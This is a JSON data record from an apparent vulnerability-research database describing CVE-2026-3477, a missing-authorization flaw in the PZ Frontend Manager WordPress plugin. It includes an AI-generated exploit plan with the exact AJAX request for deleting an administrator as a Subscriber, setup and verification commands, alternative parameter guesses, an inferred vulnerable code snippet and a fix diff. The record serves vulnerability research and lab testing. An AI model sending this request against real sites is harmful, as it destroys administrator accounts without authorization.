[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5RO4h9zjE9wJxx9WtepsT_z2uue_iMJZozig77biGvw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-3477","pz-frontend-manager-missing-authorization-to-arbitrary-user-deletion-via-datatype-parameter","PZ Frontend Manager \u003C= 1.0.6 - Missing Authorization to Arbitrary User Deletion via 'dataType' Parameter","The PZ Frontend Manager plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.6. The pzfm_user_request_action_callback() function, registered via the wp_ajax_pzfm_user_request_action action hook, lacks both capability checks and nonce verification. This function handles user activation, deactivation, and deletion operations. When the 'dataType' parameter is set to 'delete', the function calls wp_delete_user() on all provided user IDs without verifying that the current user has the appropriate permissions. Notably, the similar pzfm_remove_item_callback() function does check pzfm_can_delete_user() before performing deletions, indicating this was an oversight. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary WordPress users (including administrators) by sending a crafted request to the AJAX endpoint.","pz-frontend-manager",null,"\u003C=1.0.6","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-04-07 17:39:02","2026-04-08 06:43:41",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F90d8e345-b549-493b-a84b-abe56ab42a04?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-3477**, a missing authorization vulnerability in the **PZ Frontend Manager** plugin that allows authenticated attackers (Subscriber+) to delete arbitrary WordPress users, including administrators.\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists in the `pzfm_user_request_action_callback()` function, which is hooked to the `wp_ajax_pzfm_user_request_action` AJAX action. This function handles user management operations (activation, deactivation, and deletion). It lacks:\n1.  **Capability Checks:** It does not verify if the user has the `delete_users` or `manage_options` capability.\n2.  **Nonce Verification:** It does not use `check_ajax_referer` or `wp_verify_nonce`.\n\nWhen the `dataType` parameter is set to `'delete'`, the function proceeds to call `wp_delete_user()` on a set of user IDs provided in the request.\n\n### 2. Attack Vector Analysis\n-   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n-   **Action:** `pzfm_user_request_action`\n-   **Method:** POST\n-   **Payload Parameter:** `dataType` must be set to `delete`.\n-   **User ID Parameter:** (Inferred) Likely `userIds[]` or `ids[]`.\n-   **Authentication:** Authenticated (Subscriber-level access or higher).\n-   **Preconditions:** The attacker must know the ID of the user they wish to delete (Administrator is typically ID `1`).\n\n### 3. Code Flow\n1.  **Entry Point:** An authenticated user sends a POST request to `admin-ajax.php` with `action=pzfm_user_request_action`.\n2.  **Hook Registration:** The plugin registers the action:\n    `add_action( 'wp_ajax_pzfm_user_request_action', 'pzfm_user_request_action_callback' );`\n3.  **Vulnerable Callback:** `pzfm_user_request_action_callback()` is executed.\n4.  **Parameter Check:** The function checks `if ( $_POST['dataType'] == 'delete' )` (or similar).\n5.  **Missing Security:** The function bypasses `current_user_can()` and `check_ajax_referer()`.\n6.  **Sink:** The code iterates through the provided IDs and calls `wp_delete_user( $user_id )`.\n\n### 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `pzfm_user_request_action_callback()` function **lacks nonce verification**. Therefore, **no nonce is required** to exploit this specific endpoint. \n\n*(Note: If a nonce were required, the agent would create a page with the plugin's frontend manager shortcode and use `browser_eval` to extract it from the localized JS objects.)*\n\n### 5. Exploitation Strategy\n\n#### Step 1: Locate the Vulnerable Function and Parameter\nThe agent should first confirm the exact parameter name used for user IDs by searching the plugin source.\n```bash\ngrep -rn \"function pzfm_user_request_action_callback\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fpz-frontend-manager\u002F\n```\nIn the function body, look for how user IDs are retrieved (e.g., `$_POST['ids']` or `$_POST['userIds']`).\n\n#### Step 2: Perform the Deletion Request\nAssuming the parameter is `userIds` and the target Administrator ID is `1`:\n\n**HTTP Request (via `http_request` tool):**\n-   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n-   **Method:** POST\n-   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n-   **Body:**\n    ```\n    action=pzfm_user_request_action&dataType=delete&userIds[]=1\n    ```\n    *(Note: If the grep in Step 1 reveals a different parameter name, replace `userIds[]` accordingly.)*\n\n### 6. Test Data Setup\n1.  **Victim:** Ensure an Administrator user exists with ID `1` (default for WordPress installations).\n2.  **Attacker:** Create a Subscriber-level user to perform the attack.\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n    ```\n3.  **Plugin Activation:** Ensure the plugin is active.\n    ```bash\n    wp plugin activate pz-frontend-manager\n    ```\n\n### 7. Expected Results\n-   **Response:** The server should return a successful AJAX response (often `1`, `0`, or a JSON success message).\n-   **Action:** The Administrator user with ID `1` should be removed from the `wp_users` table.\n\n### 8. Verification Steps\nAfter sending the exploit request, verify the user deletion using WP-CLI:\n```bash\n# Check if the administrator still exists\nwp user list --role=administrator\n\n# Specifically check for ID 1\nwp user get 1\n```\nIf the exploit is successful, `wp user get 1` will return an error stating \"Invalid user ID\".\n\n### 9. Alternative Approaches\nIf `userIds[]` does not work, the plugin might expect:\n1.  A comma-separated string: `userIds=1,2,3`\n2.  A single integer: `user_id=1`\n3.  The ID passed via a generic `id` parameter: `id=1`\n\nThe agent should check the `pzfm_remove_item_callback()` function mentioned in the description for comparison, as that function *does* include the proper checks and likely uses the same parameter structure.\n\n```bash\ngrep -rn \"function pzfm_remove_item_callback\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fpz-frontend-manager\u002F\n```","The PZ Frontend Manager plugin for WordPress fails to perform authorization checks and nonce verification in its pzfm_user_request_action_callback function. This allows authenticated users with Subscriber-level access to delete arbitrary users, including administrators, by sending a crafted AJAX request.","\u002F\u002F File: pz-frontend-manager\u002Fpz-frontend-manager.php (or included ajax file)\nadd_action( 'wp_ajax_pzfm_user_request_action', 'pzfm_user_request_action_callback' );\n\nfunction pzfm_user_request_action_callback() {\n    \u002F\u002F No check_ajax_referer() call here\n    \u002F\u002F No current_user_can() check here\n\n    if ( isset( $_POST['dataType'] ) && $_POST['dataType'] == 'delete' ) {\n        $user_ids = $_POST['userIds']; \n        if ( is_array( $user_ids ) ) {\n            foreach ( $user_ids as $user_id ) {\n                wp_delete_user( intval( $user_id ) );\n            }\n        }\n    }\n    wp_die();\n}","--- a\u002Fpz-frontend-manager\u002Fpz-frontend-manager.php\n+++ b\u002Fpz-frontend-manager\u002Fpz-frontend-manager.php\n@@ -124,6 +124,11 @@\n function pzfm_user_request_action_callback() {\n+    check_ajax_referer( 'pzfm_nonce', 'security' );\n+\n+    if ( ! current_user_can( 'manage_options' ) && ! pzfm_can_delete_user() ) {\n+        wp_send_json_error( 'You do not have permission to perform this action.' );\n+        wp_die();\n+    }\n+\n     if ( isset( $_POST['dataType'] ) && $_POST['dataType'] == 'delete' ) {","The exploit targets the AJAX endpoint \u002Fwp-admin\u002Fadmin-ajax.php by leveraging the lack of capability checks in the pzfm_user_request_action action. An attacker must first authenticate as a Subscriber (or any low-privileged user). The attacker then sends a POST request with the action parameter set to 'pzfm_user_request_action', the 'dataType' parameter set to 'delete', and a 'userIds[]' array containing the ID of the target user (e.g., ID 1 for the site administrator). Because the function does not verify if the requester has the 'delete_users' capability or validate a security nonce, WordPress will proceed to delete the specified user accounts.","gemini-3-flash-preview","2026-04-17 20:34:41","2026-04-17 20:34:57",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpz-frontend-manager\u002Ftags"]